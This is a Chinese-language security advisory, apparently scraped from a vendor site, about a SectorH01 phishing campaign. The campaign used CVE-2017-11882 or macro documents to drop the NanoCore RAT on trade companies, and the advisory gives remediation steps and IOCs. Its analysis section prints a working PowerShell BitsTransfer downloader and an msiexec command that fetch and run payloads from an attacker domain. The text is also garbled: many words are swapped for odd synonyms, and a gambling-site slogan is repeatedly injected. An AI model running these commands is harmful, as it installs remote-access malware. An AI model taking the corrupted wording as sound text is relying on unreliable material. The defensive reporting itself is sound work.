首页 > 清静研究 > 清静转达 > 清静通告

SectorH01攻击组织垂纶邮件事务清静通告

宣布时间 2019-09-22

事务配景

近期检测到SectorH01攻击组织“商贸信”垂纶邮件攻击在9月泛起新一轮增添。在此次攻击中，黑客全心结构的带有office公式编辑器误差CVE-2017-11882或宏代码的恶意文档，将其作为附件批量发送至外贸行业企业邮箱中，在其翻开文档中招后植入远控木马NanoCore举行神秘信息窃取和远程控制，本次攻击岑岭时期天天乐成投递超3000个邮件地址。

事务形貌

通过溯源剖析，我们发明黑客疑似使用一款名为“****邮件群发器”的软件举行邮箱地址收罗和邮件批量投递。据测算，该软件具有5000个/小时的邮箱地址收罗能力，并且在发件时可以自动替换代理IP，已被黑客使用于针对对外贸企业的“自动化”攻击。部分受攻击企业如下：

尊龙凯时 - 人生就是搏!

凭证统计数据，有凌驾1000家企业受到此次攻击影响，其中近一半以上漫衍在广东、江苏、浙江和上海四地，其中广东占比凌驾30%。特殊是广东深圳和东莞由于制造业和外贸行业麋集，成为本次攻击受害最严重的区域。

尊龙凯时 - 人生就是搏!

从行业漫衍来看，“商贸信”攻击目的主要集中在工业制造及商业行业。统计数据显示，被攻击的88%为制造业，剩余12%是与制造业提供相关联的销售、运输、商务服务行业。

尊龙凯时 - 人生就是搏!

事务剖析

垂纶邮件主要通过伪造以下发件邮箱举行发送，其中使用最多的为

kieth@sdgtrading.co.uk
kieth@sdgtrading.co.uk
export@connect-distribution.co.uk
accounts@snapqatar.com
account@sh-seacare.com
banglore@scsplindia.com

pk3195@dataone.in

以其中一封邮件为例，从邮件头部信息中可以看到发件人为“Keith Ward/SDG /UK”，发件邮箱地址为kieth@sdgtrading.co.uk。sdgtrading是一家总部位于英国的收支口商业公司，现在翻开该公司官方网站可以正常会见。

翻开网站的contact-us页面我们发明有一个职务为UK & European Sales(英国及欧洲地区销售)的职员联系方法为keith@sdgtrading.co.uk，而这正是垂纶邮件发件邮箱(有两个字母位置交流)。我们推测攻击者可能通过爬取或者人工搜集的方法获取了该商业公司的邮件地址，然后伪装成该公司的销售职员发送垂纶邮件举行攻击。

尊龙凯时 - 人生就是搏!

垂纶邮件发件人信息

尊龙凯时 - 人生就是搏!

商业公司销售职员信息

垂纶邮件

邮件内容是关于商业订单确认和价钱咨询。邮件表述中高频泛起泛起以下文句：
“订购”、“价钱”、“价目表”、“销售条件”、“折扣”、“装运日期”、“采购规格”等。

尊龙凯时 - 人生就是搏!

邮件中还指出邮件附件中包括“想要采购的产品条目”文档，请阅读后举行回复，部分文档名如下：

RFQ0591403-SDG.doc

RFQ015770082.doc

剖析发明，附件文档中包括Office公式编辑器误差CVE-2017-11882使用代码或恶意宏代码，经由误差攻击或宏代码执行历程，会触发用于下载木马的Powershell下令执行，进一步下载木马：

'cmd.exe /c PowerShell "try{$tA=$env:temp+\'\\fo.exe\';Import-Module BitsTransfer;Start-BitsTransfer -Source \'hxxps://oppofile.duckdns.org/a/gmb.exe\' -Destination $tA;(New-Object -com Shell.Application).ShellExecute( $tA);}catch{}"'

除了使用Powershell，尚有部分攻击中使用Windows装置程序(msiexec.exe)装置MSI包文件举行木马下载：

msiEXEc /i http[:]//oppofile.duckdns.org/d/dar.msi

从现在捕获到的攻击文档中我们发明有以下木马下载地址：

hxxp://oppofile.duckdns.org/c/alex.exe
hxxp://oppofile.duckdns.org/c/dar.exe
hxxp://oppofile.duckdns.org/c/alex.exe
hxxp://oppofile.duckdns.org/c/go.exe
hxxps://oppofile.duckdns.org/a/gmb.exe
hxxps://oppofile.duckdns.org/a/alex.exe
hxxp://oppofile.duckdns.org/d/dar.msi
hxxp://oppofile.duckdns.org/e/scan.msi

hxxp://oppofile.duckdns.org/e/gmb.msi

远控木马

被下载植入的现实上是的经由混淆的远控木马NanoCore，NanoCore是使用.Net语言编写的功效强盛的远程会见控制木马（RAT），可以在目的主机上举行文件操作，屏幕控制，运行指定程序，还支持插件扩展功效，被熏染NanoCore木马的电脑会泛起严重信息泄露，攻击者还可以使用中毒电脑为跳板，对目的网络继续举行渗透入侵。

焦点�？楸患用芎笠晕煌济蒙脑谧试次募�

“tewo3zFRzUGateK2dRRrbMo6Wdh7BawEbNw3whpXsTZfWwZYJ5X2aQTf2rHJrHGpTdCgwV16xL12y4YmEZj1nol5xVq6OWJTNPKhhTT3tBIWOAi7IjgznVXv3N2fC3b2wvrYdjp6hvBPP0bLGemkdbuwNcxmAjipQGmsISXkujt”中

尊龙凯时 - 人生就是搏!

从资源中获取到数据后，经由多次解密获得最终的PE文件，然后将其Load到内存，并跳转到入口位置执行。

尊龙凯时 - 人生就是搏!

最终执行的NanoCore木马功效强盛，可执行种种恶意操作，如文件操作，注册表编辑，历程控制，文件传输，远程下令执行，键盘纪录等。以下为该木马控制端界面：

尊龙凯时 - 人生就是搏!

群发软件

通过排查，发明了一个名为“***\邮件群发器.exe”的可疑程序，使用该可疑文件名中的“***邮件群发器”要害字举行搜索，发明了这款名为****的邮件群发器软件。该软件具有从网络上批量爬取邮箱地址，并针对获得的邮箱举行批量发送指定邮件的功效。

尊龙凯时 - 人生就是搏!

我们下载该软件，并举行注册和试用。凭证其界面展示的功效，只需编写好邮件内容(恣意填写发件人姓名)、批量添加收件人地址、点击“最先群发”三步，即可将邮件快速发送至大批的目的邮箱中。

该软件还支持审查群发效果，若是有发送失败的情形，可以一键重发。发送时还可以选择自动替换代理IP，这在一定水平上可以隐藏真实发件IP。

尊龙凯时 - 人生就是搏!

该软件尚有一个主要的功效是，支持从指定网站收罗目的邮箱。该功效页面默认的源网站地址为http[:]//www.****.biz/。我们实验使用该网站举行邮箱收罗，在10分钟之内可以收罗到近800个邮箱地址，换算后一个小时之内可以收罗到5000个邮箱，而这些被收罗到的邮箱都保存被攻击的可能。

尊龙凯时 - 人生就是搏!

可以看到这个默认的邮箱收罗网站“**网”(www.*****.biz)是一个商业信息宣布平台，大宗厂商(机械、化工、电气、能源、仪器等行业)在该网站上宣布等州产品的供应或求购信息。而每一条信息都会附带厂商的电话、邮编、邮箱等联系方法，“****邮件群发器”正是从这些信息中获取了大宗的邮箱地址。

尊龙凯时 - 人生就是搏!

攻击思绪

从以下几个角度，我们以为黑客使用了邮件群发软件“****邮件群发器”举行辅助攻击：

1、群发软件“****”有近期会见发件人IP的纪录；
2、受害企业类型与“****邮件群发器”默认收罗邮箱类型一致(工业品商业公司)；
3、攻击的影响规模与该软件的收罗能力吻合(受害邮箱约3000个/日 & 软件的收罗能力约5000个/小时)。
推测黑客实验攻击的思绪如下：
1、黑客下载邮件群发软件；
2、结构带有CVE-2017-11882误差使用(或者宏代码)的office恶意文件；
3、使用****邮件群发器从商业分类信息网站批量收罗目的邮箱地址；
4、使用准备好的恶意文档作为附件，结构垂纶邮件并批量发送；
5、期待收件人翻开附件并中招，通过远控木马NanoCore对目的举行远程控制。

尊龙凯时 - 人生就是搏!

总结

在此次攻击事务中可以发明，黑客与灰产从业职员泛起了交集�；也霸笨⒊鲇始悍⒐ぞ�，工具可针对网站上的果真邮箱举行爬取，可使用获取到的邮箱举行批量群发邮件。工具在其注册的“官网”上举行果真售卖，使用说明中“正义”地提到“仅用于正规邮件营销，滥用者效果自尊”。但工具一旦售出，便难以包管被用于正当用途。

而黑客获得此软件后，将其纳入攻击武器中的一员。随后，只需编写好木马，结构垂纶邮件，就可以使用该工具将垂纶邮件自动化、大批量地发送至企业的相关邮箱中。

修复建议

1、企业邮箱网管将以下发件邮箱设置为黑名单

kieth@sdgtrading.co.uk
export@connect-distribution.co.uk
accounts@snapqatar.com
account@sh-seacare.com
banglore@scsplindia.com

pk3195@dataone.in

2、不要翻开不明泉源的邮件附件，关于附件中的文件要审慎运行，如发明有剧本或其他可执行文件可先使用杀毒软件举行扫描；

3、升级office系列软件到最新版本，实时修复office程序误差，不要随意运行不可信文档中的宏；

4、推荐安排终端清静管理系统防御病毒木马攻击；

5、使用入侵检测系统检测未知黑客的种种可疑攻击行为。

IOC

邮箱

kieth@sdgtrading.co.uk
export@connect-distribution.co.uk
accounts@snapqatar.com
account@sh-seacare.com
banglore@scsplindia.com

pk3195@dataone.in

邮件附件

fec34e9741abedea7f0a4fa991bdc618
11dd68ba724a7e34cdab1aae97a93190
3f36befc186d10551b5a4d65ac35978d
e4b1a5e14064e7c716530528e7615374
3f36befc186d10551b5a4d65ac35978d
1ffd02ef62e8feb788968518fe5fbdb2
a9958884c16f17c2c9e4d75f92117352
d6b697c64723909f0b357e2d49948905

a9958884c16f17c2c9e4d75f92117352

NanaCore木马

2c7885159feae6ebde634418591ad276

453a235ad5ea7055f2af2c51c95a5bb2

域名

oppofile.duckdns.org

URL

hxxp://oppofile.duckdns.org/e/gmb.msi

参考链接

https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/

7*24小时服务热线

400-624-3900

官方微信

官方微博

网御星云合众数据书生电子云子可信

执法声明

尊龙凯官网入口

网络清静防护

网络清静检测

应用清静

数据清静

清静管理

云清静

工控清静

移动及终端清静

密码应用清静

大模子应用清静

专业清静服务

清静运营中心

知白学院

威胁情报中心

清静转达

研究报告

清静团队

渠道系统

售后服务

升级通告

软件升级

公司概况

新闻动态

手艺专题

人才招聘

投资者关系

资源中心

联系尊龙凯官网入口

清静研究

SectorH01攻击组织垂纶邮件事务清静通告

关于尊龙凯官网入口

解决计划

清静研究

联系尊龙凯官网入口

7*24小时服务热线